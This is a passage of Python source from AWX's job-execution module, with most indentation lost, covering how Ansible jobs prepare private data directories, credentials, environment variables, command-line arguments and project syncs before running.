self.update_attempts = int(settings.DISPATCHER_DB_DOWNTIME_TOLERANCE / 5)
self.runner_callback = self.callback_class(model=self.model)
def update_model(self, pk, _attempt=0, **updates):
return update_model(self.model, pk, _attempt=0, _max_attempts=self.update_attempts, **updates)
def write_private_data_file(self, private_data_dir, file_name, data, sub_dir=None, file_permissions=0o600):
base_path = private_data_dir
if sub_dir:
base_path = os.path.join(private_data_dir, sub_dir)
os.makedirs(base_path, mode=0o700, exist_ok=True)
        # If we got a file name, create it; otherwise we want a temp file
if file_name:
file_path = os.path.join(base_path, file_name)
else:
handle, file_path = tempfile.mkstemp(dir=base_path)
os.close(handle)
file = Path(file_path)
file.touch(mode=file_permissions, exist_ok=True)
with open(file_path, 'w') as f:
f.write(data)
return file_path
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
"""
Return params structure to be executed by the container runtime
"""
if settings.IS_K8S and instance.instance_group.is_container_group:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"process_isolation_executable": "podman", # need to provide, runner enforces default via argparse
"container_options": ['--user=root'],
}
if settings.DEFAULT_CONTAINER_RUN_OPTIONS:
params['container_options'].extend(settings.DEFAULT_CONTAINER_RUN_OPTIONS)
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if all([cred.has_input(field_name) for field_name in ('host', 'username', 'password')]):
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
verify_ssl = cred.get_input('verify_ssl')
params['container_auth_data'] = {'host': host, 'username': username, 'password': password, 'verify_ssl': verify_ssl}
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Verify if a mount path and SELinux context has been passed
# Using z allows the dir to be mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
if this_path.count(':') == MAX_ISOLATED_PATH_COLON_DELIMITER:
src, dest, mount_option = this_path.split(':')
                    # mount_option validation is performed via the API, but since this can be overridden via settings.py
if mount_option not in CONTAINER_VOLUMES_MOUNT_TYPES:
mount_option = 'z'
logger.warning(f'The path {this_path} has volume mount type {mount_option} which is not supported. Using "z" instead.')
params['container_volume_mounts'].append(f'{src}:{dest}:{mount_option}')
elif this_path.count(':') == MAX_ISOLATED_PATH_COLON_DELIMITER - 1:
src, dest = this_path.split(':')
params['container_volume_mounts'].append(f'{src}:{dest}:z')
else:
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
        Return structure is a dict; see RunJob.build_private_data for the expected form.
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
path = tempfile.mkdtemp(prefix=JOB_FOLDER_PREFIX % instance.pk, dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(path)
# We will write files in these folders later
for subfolder in ('inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_project_dir(self, instance, private_data_dir):
"""
Create the ansible-runner project subdirectory. In many cases this is the source checkout.
In cases that do not even need the source checkout, we create an empty dir to be the workdir.
"""
project_dir = os.path.join(private_data_dir, 'project')
if not os.path.exists(project_dir):
os.mkdir(project_dir)
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
ssh_key_data = None
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
ssh_key_data = data
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
private_data_files['credentials'][credential] = self.write_private_data_file(private_data_dir, None, data, sub_dir='env')
for credential, data in private_data.get('certificates', {}).items():
self.write_private_data_file(private_data_dir, 'ssh_key_data-cert.pub', data, sub_dir=os.path.join('artifacts', str(self.instance.id)))
return private_data_files, ssh_key_data
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
content = yaml.safe_dump(vars)
else:
content = safe_dump(vars, safe_dict)
return self.write_private_data_file(private_data_dir, 'extravars', content, sub_dir='env')
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError(f'The {self.model.__name__} could not run because there is no Execution Environment.')
return env
def write_inventory_file(self, inventory, private_data_dir, file_name, script_params):
script_data = inventory.get_script_data(**script_params)
for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items():
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.runner_callback.host_map[hostname] = hv.get('remote_tower_id', '')
file_content = '#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json.dumps(script_data)
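        # The inventory is written as an executable Python script (hence the 0o700
        # permissions below) that prints the JSON data, so Ansible consumes it as a
        # dynamic inventory source.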
return self.write_private_data_file(private_data_dir, file_name, file_content, sub_dir='inventory', file_permissions=0o700)
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
return self.write_inventory_file(instance.inventory, private_data_dir, 'hosts', script_params)
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
return self.write_private_data_file(private_data_dir, 'cmdline', ansible_runner.utils.args2cmdline(*args), sub_dir='env')
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
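        # e.g. (hypothetical values) password_prompts {'SSH password:\s*?$': 'ssh_password'}
        # with passwords {'ssh_password': 's3cret'} yields {'SSH password:\s*?$': 's3cret'}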
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def release_lock(self, project):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, project.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
def acquire_lock(self, project, unified_job_id=None):
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
lock_path = project.get_lock_file()
if lock_path is None:
            # If the project came from a migration, or someone blanked local_path for any other reason, this is recoverable by saving
project.save()
lock_path = project.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
emitted_lockfile_log = False
start_time = time.time()
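        # Poll with a non-blocking lock instead of blocking in fcntl so the loop
        # stays responsive to the cancel flag and shutdown signals while another
        # job holds the project lock.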
while True:
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
if not emitted_lockfile_log:
logger.info(f"exception acquiring lock {lock_path}: {e}")
emitted_lockfile_log = True
time.sleep(1.0)
self.instance.refresh_from_db(fields=['cancel_flag'])
if self.instance.cancel_flag or signal_callback():
logger.debug(f"Unified job {self.instance.id} was canceled while waiting for project file lock")
return
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info(f'Job {unified_job_id} waited {waiting_time} to acquire lock for local source tree for path {lock_path}.')
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
# Before task is started, ensure that job_event partitions exist
create_partition(instance.event_class._meta.db_table, start=instance.created)
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
collections_info = os.path.join(artifact_dir, 'collections.json')
ansible_version_file = os.path.join(artifact_dir, 'ansible_version.txt')
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def should_use_fact_cache(self):
return False
@with_path_cleanup
@with_signal_handling
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.status != 'canceled' and self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, start_args='', status='canceled')
if self.instance.status not in ACTIVE_STATES:
# Prevent starting the job if it has been reaped or handled by another process.
raise RuntimeError(f'Not starting {self.instance.status} task pk={pk} because {self.instance.status} is not a valid active state')
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
        # Keep a reference on self.instance because of the update_model pattern and because it is used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
self.runner_callback.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_cred_env = {}
private_data_dir = None
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.build_project_dir(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag or signal_callback():
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# May have to serialize the value
private_data_files, ssh_key_data = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.runner_callback.safe_env = build_safe_env(env)
self.runner_callback.instance = self.instance
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.runner_callback.parent_workflow_job_id = self.instance.get_workflow_job().id
self.runner_callback.job_created = str(self.instance.created)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.runner_callback.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'suppress_env_files': getattr(settings, 'AWX_RUNNER_OMIT_ENV_FILES', True),
'envvars': env,
}
if ssh_key_data is not None:
params['ssh_key'] = ssh_key_data
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
            # TODO: refactor into a better BaseTask method
if self.should_use_fact_cache():
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
runner_settings = {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
'suppress_output_file': getattr(settings, 'AWX_RUNNER_SUPPRESS_OUTPUT_FILE', True),
}
idle_timeout = getattr(settings, 'DEFAULT_JOB_IDLE_TIMEOUT', 0)
if idle_timeout > 0:
runner_settings['idle_timeout'] = idle_timeout
# Write out our own settings file
self.write_private_data_file(private_data_dir, 'settings', json.dumps(runner_settings), sub_dir='env')
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.runner_callback.event_handler,
finished_callback=self.runner_callback.finished_callback,
status_handler=self.runner_callback.status_handler,
cancel_callback=signal_callback,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
res = receptor_job.run()
self.unit_id = receptor_job.unit_id
if not res:
return
status = res.status
rc = res.rc
if status in ('timeout', 'error'):
self.runner_callback.delay_update(skip_if_already_set=True, job_explanation=f"Job terminated due to {status}")
if status == 'timeout':
status = 'failed'
elif status == 'canceled':
self.instance = self.update_model(pk)
cancel_flag_value = getattr(self.instance, 'cancel_flag', False)
if (cancel_flag_value is False) and signal_callback():
self.runner_callback.delay_update(skip_if_already_set=True, job_explanation="Task was canceled due to receiving a shutdown signal.")
status = 'failed'
elif cancel_flag_value is False:
self.runner_callback.delay_update(skip_if_already_set=True, job_explanation="The running ansible process received a shutdown signal.")
status = 'failed'
except ReceptorNodeNotFound as exc:
self.runner_callback.delay_update(job_explanation=str(exc))
except Exception:
# this could catch programming or file system errors
self.runner_callback.delay_update(result_traceback=traceback.format_exc())
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.runner_callback.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
self.runner_callback.delay_update(job_explanation=exc.args[0])
if exc.tb:
self.runner_callback.delay_update(result_traceback=exc.tb)
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, select_for_update=True, **self.runner_callback.get_delayed_update_fields())
# Field host_status_counts is used as a metric to check if event processing is finished
# we send notifications if it is, if not, callback receiver will send them
if (self.instance.host_status_counts is not None) or (not self.runner_callback.wrapup_event_dispatched):
self.instance.send_notification_templates('succeeded' if status == 'successful' else 'failed')
try:
self.final_run_hook(self.instance, status, private_data_dir)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
class SourceControlMixin(BaseTask):
"""Utility methods for tasks that run use content from source control"""
def get_sync_needs(self, project, scm_branch=None):
project_path = project.get_project_path(check_if_exists=False)
job_revision = project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(project.scm_type)
branch_override = bool(scm_branch and scm_branch != project.scm_branch)
        # TODO: skip syncs for inventory updates. For now, the UI needs a link added so clients can link to the project
# source_project is only a field on inventory sources.
if isinstance(self.instance, InventoryUpdate):
sync_needs.append(source_update_tag)
elif not project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug(f'Performing fresh clone of {project.id} for unified job {self.instance.id} on this instance.')
sync_needs.append(source_update_tag)
elif project.scm_type == 'git' and project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug(f'Skipping project sync for {self.instance.id} because commit is locally available')
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug(f'Needed commit for {self.instance.id} not in local source tree, will sync with remote')
sync_needs.append(source_update_tag)
else:
logger.debug(f'Project not available locally, {self.instance.id} will sync with remote')
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(project.get_cache_path(), project.cache_id))
# Galaxy requirements are not supported for manual projects
if project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
return sync_needs
def spawn_project_sync(self, project, sync_needs, scm_branch=None):
pu_ig = self.instance.instance_group
pu_en = Instance.objects.my_hostname()
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
controller_node=pu_en,
celery_task_id=self.instance.celery_task_id,
)
if scm_branch and scm_branch != project.scm_branch:
sync_metafields['scm_branch'] = scm_branch
            sync_metafields['scm_clean'] = True  # to accommodate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = project.scm_revision
local_project_sync = project.create_project_update(_eager_fields=sync_metafields)
local_project_sync.log_lifecycle("controller_node_chosen")
local_project_sync.log_lifecycle("execution_node_chosen")
return local_project_sync
def sync_and_copy_without_lock(self, project, private_data_dir, scm_branch=None):
sync_needs = self.get_sync_needs(project, scm_branch=scm_branch)
if sync_needs:
local_project_sync = self.spawn_project_sync(project, sync_needs, scm_branch=scm_branch)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
if isinstance(self.instance, Job):
self.instance = self.update_model(self.instance.pk, project_update=local_project_sync)
else:
self.instance = self.update_model(self.instance.pk, source_project_update=local_project_sync)
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = RunProjectUpdate(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
self.instance = self.update_model(self.instance.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
self.instance = self.update_model(
self.instance.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "project_update", '
f'"job_name": "{local_project_sync.name}", "job_id": "{local_project_sync.id}"}}'
),
)
raise
self.instance.refresh_from_db()
if self.instance.cancel_flag:
return
else:
            # Case where a local sync is not needed, meaning that the local tree is
            # up-to-date with the project; the job runs the project's current version
self.instance = self.update_model(self.instance.pk, scm_revision=project.scm_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(project, private_data_dir)
def sync_and_copy(self, project, private_data_dir, scm_branch=None):
self.acquire_lock(project, self.instance.id)
is_commit = False
try:
original_branch = None
failed_reason = project.get_reason_if_failed()
if failed_reason:
self.update_model(self.instance.pk, status='failed', job_explanation=failed_reason)
raise RuntimeError(failed_reason)
project_path = project.get_project_path(check_if_exists=False)
if project.scm_type == 'git' and (scm_branch and scm_branch != project.scm_branch):
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
is_commit = True
original_branch = git_repo.head.commit
else:
original_branch = git_repo.active_branch
return self.sync_and_copy_without_lock(project, private_data_dir, scm_branch=scm_branch)
finally:
# We have made the copy so we can set the tree back to its normal state
if original_branch:
                # for git project syncs, non-default branches can be problematic;
                # restore the branch the repo was on before this run
try:
if is_commit:
git_repo.head.set_commit(original_branch)
git_repo.head.reset(index=True, working_tree=True)
else:
original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception(f'Failed to restore project repo to prior state after {self.instance.id}')
self.release_lock(project)
@task(queue=get_task_queuename)
class RunJob(SourceControlMixin, BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
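        # Build the collections/roles path variables so that content downloaded for
        # this job (under CONTAINER_ROOT) takes precedence over paths already set in
        # the environment or ansible.cfg, which in turn take precedence over the
        # stock defaults.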
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
('ANSIBLE_COLLECTIONS_PATH', 'collections_path', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
)
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def should_use_fact_cache(self):
return self.instance.use_fact_cache
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
extra_vars = dict()
# load in JT extra vars
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# load in meta vars, overriding any variable set in JT extra vars
extra_vars.update(job.awx_meta_vars())
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
        # higher levels of privilege - those that have the ability to create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
